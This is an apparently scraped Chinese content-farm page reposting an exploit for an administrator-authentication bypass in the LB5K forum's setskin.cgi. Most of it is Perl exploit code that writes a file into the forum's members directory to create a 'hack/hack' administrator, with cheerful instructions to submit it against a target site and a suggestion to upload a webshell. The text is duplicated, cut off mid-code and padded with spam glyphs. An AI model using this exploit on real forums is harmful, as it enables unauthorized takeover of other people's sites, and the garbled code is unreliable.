豪仕知识网--知识就是力量!

微信
手机版
生活常识

LB5K论坛setskin.cgi存在管理员验证可绕开漏洞

作者 :慕容渊博 2024-01-17 16:31:17 围观 : 评论

LB5K论坛setskin.cgi存在管理员验证可绕开漏洞

豪士君测试所用平台

纪录美好生活,一起观趣事,这里包罗IT知识,豪仕知识网是信息的海洋,有你听不到的故事,接下来我们一起来看看LB5K论坛setskin.cgi存在管理员验证可绕开漏洞。

>>>DedicatedThisScrapToCaoJing<<param;foreach(@params){$theparam=$query->param($_);$theparam=~s/\@/\\\@/g;$theparam=~s/\$/\\\$/g;$theparam=&unHTML("$theparam");${$_}=$theparam;----------------------------------------------哈哈,爽吧,还等什么,直接提交如下URL进入:/d/file/2024/01/17/63525.cgi####注意:此处请修改####$ad="/hack.cgi";opendir(DIR,"$lbpath");@files=readdir(DIR);close(DIR);@memdir=grep(/^members/,@files);$hack=$lbpath.@memdir[0].$ad;open(HACK,">$hack");printHACK"hack\thack\thack\tad\n";----------------------------------------------假使你把文件名定为love.cgi,在/somepath目录下,提交http://www.target.com/somepath/love.cgi哦,一个hack/hack管理员诞生了!当然,上传个功能强使用方便的webshell上去也行,不过那是你自己的工作了!>>>DedicatedThisScrapToCaoJing<<param;foreach(@params){$theparam=$query->param($_);$theparam=~s/\@/\\\@/g;$theparam=~s/\$/\\\$/g;$theparam=&unHTML("$theparam");${$_}=$theparam;----------------------------------------------哈哈,爽吧,还等什么,直接提交如下URL进入:/d/file/2024/01/17/63525.cgi####注意:此处请修改####$ad="/hack.cgi";opendir(DIR,"$lbpath");@files=readdir(DIR);close(DIR);@memdir=grep(/^members/,@files);$hack=$lbpath.@memdir[0].$ad;open(HACK,">$hack");printHACK"hack\thack\thack\tad\n";----------------------------------------------假使你把文件名定为love.cgi,在/somepath目录下,提交/d/file/2024/01/17/63527 ◐◐◐◐●☛█▼▲豪仕知识网███████豪仕知识网HTtp://www.haoZ.net▼▲▼▲▼▲▼▲▼●●●●●●●▼▲▼▲▼▲

关于LB5K论坛setskin.cgi存在管理员验证可绕开漏洞的内容到此结束,希望对大家有所帮助。豪仕知识网往后会继续推荐LB5K论坛setskin.cgi存在管理员验证可绕开漏洞相关内容。

相关文章